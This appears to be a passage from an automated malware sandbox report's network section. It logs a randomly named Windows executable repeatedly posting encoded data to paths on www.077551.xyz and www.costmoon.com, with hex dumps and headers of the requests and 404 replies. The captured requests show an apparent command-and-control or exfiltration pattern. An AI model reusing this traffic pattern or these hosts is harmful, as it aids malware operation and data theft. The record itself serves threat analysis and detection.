                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 52 35 7a 32 6a 43 59 66 53 57 55 55 35 59 7a 38 6e 43 57 6f 6e 4b 6a 4d 6e 71 7a 70 77 79 6e 48 33 70 4c 64 6a 53 73 35 67 70 55 79 32 39 6e 4f 70 33 61 61 55 4a 79 41 72 67 33 39 61 67 49 79 6f 6c 5a 61 52 55 46 51 39 5a 35 45 6e 66 67 64 42 68 4c 57 2f 68 71 31 4c 38 65 61 6c 53 39 42 58 54 52 46 4a 61 67 35 55 6d 46 7a 54 56 54 67 72 4d 79 42 34 59 4a 6c 46 70 65 6a 67 6d 36 6b 59 35 64 55 74 64 75 4e 58 4b 2f 56 35 33 63 2f 77 37 71 34 51 5a 36 71 6c 78 6e 43 51 4a 32 45 53 2b 46 30 30 45 66 4f 61 69 6b 2b 4b 38 58 74 34 35 63 4b 64 58 53 4d 55 6e 69 52 6d 4d 31 54 77 3d 3d
                                                          Data Ascii: TvpPfhGp=VR5z2jCYfSWUU5Yz8nCWonKjMnqzpwynH3pLdjSs5gpUy29nOp3aaUJyArg39agIyolZaRUFQ9Z5EnfgdBhLW/hq1L8ealS9BXTRFJag5UmFzTVTgrMyB4YJlFpejgm6kY5dUtduNXK/V53c/w7q4QZ6qlxnCQJ2ES+F00EfOaik+K8Xt45cKdXSMUniRmM1Tw==
                                                          Jul 3, 2024 15:57:57.156107903 CEST716INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:57 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFeR61Favkmtd%2FCCIaNnbqBf7cIn1p%2BY8DNB7GZ75LVVdA693jbZmguceiFUtcpwr5xUbiMHC%2FWsLEnDn0ewajuHYLpfB1%2BW4QTFwnSCQ%2BWWcd7c3xPFF6aoG7IwUomEaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d76334c9020f6f-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449755104.21.84.69801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:57:58.741971970 CEST740OUTPOST /4ogj/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          Origin: http://www.077551.xyz
                                                          Referer: http://www.077551.xyz/4ogj/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 52 35 7a 32 6a 43 59 66 53 57 55 47 6f 49 7a 2f 45 71 57 76 48 4b 67 44 48 71 7a 6a 51 79 6a 48 33 31 4c 64 68 2b 38 2b 53 4e 55 79 57 4e 6e 50 6f 33 61 58 30 4a 79 53 4c 68 7a 67 4b 67 48 79 6f 5a 2f 61 51 6f 46 51 39 4e 35 45 6d 76 67 64 77 68 4b 58 76 68 6f 35 72 38 63 65 6c 53 39 42 58 54 52 46 4b 6e 4e 35 58 57 46 7a 69 6c 54 76 75 34 7a 43 34 59 4b 69 46 70 65 75 41 6d 32 6b 59 34 2b 55 76 70 45 4e 55 79 2f 56 37 66 63 38 68 36 38 33 51 5a 38 6e 46 77 72 45 79 34 39 47 43 58 45 31 43 4d 7a 48 37 62 48 2f 4d 74 4e 38 4a 59 4c 59 64 7a 68 52 54 75 57 63 6c 78 38 49 2f 58 6e 57 2b 42 4e 68 71 35 63 61 79 39 6f 62 57 47 65 61 47 4d 3d
                                                          Data Ascii: TvpPfhGp=VR5z2jCYfSWUGoIz/EqWvHKgDHqzjQyjH31Ldh+8+SNUyWNnPo3aX0JySLhzgKgHyoZ/aQoFQ9N5EmvgdwhKXvho5r8celS9BXTRFKnN5XWFzilTvu4zC4YKiFpeuAm2kY4+UvpENUy/V7fc8h683QZ8nFwrEy49GCXE1CMzH7bH/MtN8JYLYdzhRTuWclx8I/XnW+BNhq5cay9obWGeaGM=
                                                          Jul 3, 2024 15:57:59.675770044 CEST714INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:57:59 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UXJODCru3E7%2BYKtEYeDhBg5GaCiHTtMc2F0Zpy5wvsTB7kIbk6%2B8BDT2DldnKbB2ryZN9CJDFRFeVfNZbc0Q1qJs6Bbj%2B3aPV8huajNQrjRlZIsLS7Rc7OuQ02lzH%2F7otA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d76344bba619ff-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449756104.21.84.69801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:01.272028923 CEST10822OUTPOST /4ogj/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          Origin: http://www.077551.xyz
                                                          Referer: http://www.077551.xyz/4ogj/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 52 35 7a 32 6a 43 59 66 53 57 55 47 6f 49 7a 2f 45 71 57 76 48 4b 67 44 48 71 7a 6a 51 79 6a 48 33 31 4c 64 68 2b 38 2b 53 46 55 78 6e 74 6e 4f 4c 66 61 57 30 4a 79 4a 4c 68 2b 67 4b 67 65 79 6f 78 37 61 51 6b 56 51 2f 31 35 47 41 62 67 55 6c 42 4b 5a 76 68 6f 6b 62 38 64 61 6c 53 30 42 58 6a 64 46 4a 66 4e 35 58 57 46 7a 67 39 54 72 37 4d 7a 45 34 59 4a 6c 46 6f 52 6a 67 6d 61 6b 59 51 41 55 76 74 2b 4d 6c 53 2f 56 62 50 63 73 44 53 38 6f 67 5a 2b 6b 46 78 32 45 79 30 79 47 43 4c 79 31 43 51 64 48 37 2f 48 39 61 34 61 34 73 34 4a 50 73 44 72 4a 53 79 56 59 47 74 66 4c 35 33 49 58 2f 49 53 32 65 31 74 58 31 49 4b 63 6b 66 5a 59 54 7a 47 64 50 44 57 44 2f 2f 38 76 72 77 56 71 67 43 6b 73 77 50 59 58 61 57 56 70 49 39 54 39 33 6a 37 7a 76 46 68 71 56 64 4c 38 6b 6d 58 58 39 41 30 6f 7a 6a 4a 4e 72 42 74 48 30 79 4a 4a 65 41 6d 33 68 59 42 50 2b 44 2b 33 58 56 47 56 62 58 75 46 4a 42 72 50 51 57 6a 45 52 38 79 67 35 52 62 38 38 51 65 53 41 55 73 70 39 31 4b 49 30 6b 64 6c [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=VR5z2jCYfSWUGoIz/EqWvHKgDHqzjQyjH31Ldh+8+SFUxntnOLfaW0JyJLh+gKgeyox7aQkVQ/15GAbgUlBKZvhokb8dalS0BXjdFJfN5XWFzg9Tr7MzE4YJlFoRjgmakYQAUvt+MlS/VbPcsDS8ogZ+kFx2Ey0yGCLy1CQdH7/H9a4a4s4JPsDrJSyVYGtfL53IX/IS2e1tX1IKckfZYTzGdPDWD//8vrwVqgCkswPYXaWVpI9T93j7zvFhqVdL8kmXX9A0ozjJNrBtH0yJJeAm3hYBP+D+3XVGVbXuFJBrPQWjER8yg5Rb88QeSAUsp91KI0kdl6HECXGVBMOB3wyBW01cPTLzpoIzrROl4jfFhWzCkHZ5meuJGDvNmDGGkaLyntpZvwD9IWdQ02ut6f9FuVkxxG3eDz1X0t8MvoutMyzwhZonfNjRunNCuESy4OHoer+tIYPRS9tEJ6vsK5Lx3c7sT7xGZn9E9S7mo02wsQ6tJn7TJyEzSyE0ngmMgtcMA3CFMXtFfbAbNepgWox3Hg6g87OFqa55ro5jtieD2WpFC014eUMLs8lJ1I7WgO9zxjX8jqFEkAmOZOpMkHQYQ9bve6oTSra+zfR88OPsb2UJ3KtA9U1oSpd/M51gAFNf+g6us76o3XcPR/KaV/b03lUycOmpAqN6KnysIRQ/MZX0RO7OZXGwgtyIfJL59IgKC9ykYdQ2/uhL2yTBQ1Dsxsw+aVeN+0Kc4sQ1EB1+2vtjjxFHpm9LTxuwqL3If82z51WXTU5odSpO02H9K5MdmfPCzJGLgxV55HKl+Qs3fx3aScjhnfye3yoflX/nQRUEQ0M0nsK0Fs81qBcbu29nF/KlqVSPlyeupcX+1uibUUtdWWAAYBcqGVfUdrxnglfFpM7k3B2Fh3ChXLhSqxxf3FkgLDGC3ZjfD5G8xF1jEfeaGMWQu5xbehcLvXdjJ/WU6H/0+itClilP2q6OlJHPIf4E1Kx5lkvleQlZtST [TRUNCATED]
                                                          Jul 3, 2024 15:58:02.164757967 CEST714INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:58:02 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwfe6%2FKODcAS76QtiBNnsKpDFM9jeiGjByxQ7wEYaPj%2B5pMTMG0V5xHQc%2BbQJptsrFe1emHta6Ax%2FAftnYuzRmHTjHxugnEMdnjFxpo6pdQi6yJ9VZv9ryZhSY0YKg6rww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d7635479df1a03-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.449757104.21.84.69801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:03.808232069 CEST459OUTGET /4ogj/?TvpPfhGp=YTRT1VqeLBjCR4EP9RCwoUuRD3fAmDmZSXxlYBWmziMpmVFqJYD2flBFEL5Xrb4qxpJfVCdAXewDQ3blUDpCJrAw7sENNjOuYnGrLaGL8E6T/3d2k8tiM5Q=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.077551.xyz
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:04.726861954 CEST723INHTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:58:04 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JsusM2VwyCyw4jpMO2iPY5eVEtvEnQkIaAzG8CzXHISpTixv8trpx71O9ZKPSqN5qQCH1oy3nu4OYKIX9VG8EHG2dsjypZ3cRlR8i4x6QWRU%2BcO%2BArhEwQ9X8jENGd9jBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89d763644b3dc358-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.44975874.208.236.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:09.960850954 CEST726OUTPOST /8g7d/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          Origin: http://www.costmoon.com
                                                          Referer: http://www.costmoon.com/8g7d/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 6d 55 7a 37 73 5a 32 52 6d 59 2b 5a 6f 34 6e 2b 79 6e 79 63 67 65 39 69 49 37 4c 75 70 66 62 61 4c 6f 6e 48 39 79 2f 69 7a 55 77 4f 6d 41 5a 36 65 30 48 41 4f 64 49 47 4f 71 70 5a 67 75 5a 76 62 2f 64 32 6c 50 6e 4a 44 62 55 52 39 75 5a 56 2b 33 74 6f 51 6b 5a 33 30 74 78 58 6e 39 57 33 71 53 42 39 53 45 43 66 67 73 42 56 77 4d 33 65 55 44 70 71 61 45 5a 41 49 79 78 6a 57 45 4f 50 7a 55 52 48 64 30 41 46 46 31 65 78 57 58 70 64 31 4d 4a 4b 56 4d 2f 64 42 5a 4b 79 70 74 45 2f 68 50 48 6f 38 63 49 55 73 77 6e 48 53 6c 78 6b 37 5a 2b 4c 41 6d 6e 4e 35 39 5a 71 31 30 72 36 66 67 3d 3d
                                                          Data Ascii: TvpPfhGp=mUz7sZ2RmY+Zo4n+ynycge9iI7LupfbaLonH9y/izUwOmAZ6e0HAOdIGOqpZguZvb/d2lPnJDbUR9uZV+3toQkZ30txXn9W3qSB9SECfgsBVwM3eUDpqaEZAIyxjWEOPzURHd0AFF1exWXpd1MJKVM/dBZKyptE/hPHo8cIUswnHSlxk7Z+LAmnN59Zq10r6fg==
                                                          Jul 3, 2024 15:58:10.505834103 CEST580INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:10 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.44975974.208.236.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:12.500266075 CEST746OUTPOST /8g7d/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          Origin: http://www.costmoon.com
                                                          Referer: http://www.costmoon.com/8g7d/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 6d 55 7a 37 73 5a 32 52 6d 59 2b 5a 70 62 50 2b 69 77 6d 63 6f 65 39 68 48 62 4c 75 69 2f 62 67 4c 6f 6a 48 39 7a 4c 4d 7a 67 63 4f 68 69 42 36 5a 32 2f 41 4e 64 49 47 46 4b 6f 54 75 4f 5a 65 62 2f 51 4c 6c 4f 62 4a 44 66 38 52 39 73 42 56 39 47 74 6e 52 30 5a 78 39 4e 78 56 6a 39 57 33 71 53 42 39 53 45 47 68 67 73 4a 56 78 38 48 65 47 79 70 72 62 45 5a 44 50 79 78 6a 48 55 4f 4c 7a 55 52 66 64 78 6b 72 46 33 57 78 57 56 68 64 32 59 56 4a 63 4d 2f 62 65 4a 4c 46 34 6f 39 37 6b 36 69 55 7a 76 56 78 78 69 58 5a 54 6a 67 2b 71 6f 66 63 53 6d 44 2b 6b 36 51 65 34 33 57 7a 45 71 63 69 57 50 69 52 47 56 56 4b 73 35 45 70 70 63 74 32 49 47 34 3d
                                                          Data Ascii: TvpPfhGp=mUz7sZ2RmY+ZpbP+iwmcoe9hHbLui/bgLojH9zLMzgcOhiB6Z2/ANdIGFKoTuOZeb/QLlObJDf8R9sBV9GtnR0Zx9NxVj9W3qSB9SEGhgsJVx8HeGyprbEZDPyxjHUOLzURfdxkrF3WxWVhd2YVJcM/beJLF4o97k6iUzvVxxiXZTjg+qofcSmD+k6Qe43WzEqciWPiRGVVKs5Eppct2IG4=
                                                          Jul 3, 2024 15:58:13.017472029 CEST580INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:12 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                          Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.44976074.208.236.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:15.035931110 CEST10828OUTPOST /8g7d/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.costmoon.com
                                                          Origin: http://www.costmoon.com
                                                          Referer: http://www.costmoon.com/8g7d/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 6d 55 7a 37 73 5a 32 52 6d 59 2b 5a 70 62 50 2b 69 77 6d 63 6f 65 39 68 48 62 4c 75 69 2f 62 67 4c 6f 6a 48 39 7a 4c 4d 7a 67 55 4f 68 52 4a 36 5a 58 2f 41 44 39 49 47 5a 61 6f 53 75 4f 5a 44 62 2f 49 48 6c 4f 58 2f 44 5a 34 52 39 4a 56 56 38 30 46 6e 62 30 5a 78 2f 4e 78 55 6e 39 57 69 71 52 70 35 53 45 32 68 67 73 4a 56 78 2b 50 65 57 7a 70 72 57 6b 5a 41 49 79 78 6b 57 45 50 73 7a 58 68 50 64 77 6c 65 46 44 69 78 57 31 52 64 6c 62 39 4a 45 63 2f 5a 66 4a 4c 64 34 6f 35 30 6b 2b 44 6c 7a 73 49 61 78 68 4c 5a 54 44 6c 7a 39 72 48 33 4f 6d 48 79 78 70 34 75 77 68 43 56 41 34 74 58 57 66 57 61 63 52 4e 5a 6f 75 35 42 35 5a 46 4c 61 57 65 2f 4f 61 6a 4e 76 67 34 35 30 31 7a 36 4b 58 6e 6f 44 45 55 70 7a 6b 66 67 73 6b 50 32 54 31 62 6d 53 71 52 6f 6e 77 33 32 79 4d 77 39 68 69 6a 38 2f 2b 44 4f 6b 75 51 69 7a 32 4a 5a 30 58 37 54 4b 68 51 7a 67 51 53 57 4e 6a 65 36 75 79 4c 79 7a 73 5a 4b 6e 31 78 63 75 62 57 2b 4f 42 39 77 4f 79 2b 4f 6b 4c 51 30 54 4a 52 4e 48 67 4c 6c 48 [TRUNCATED]
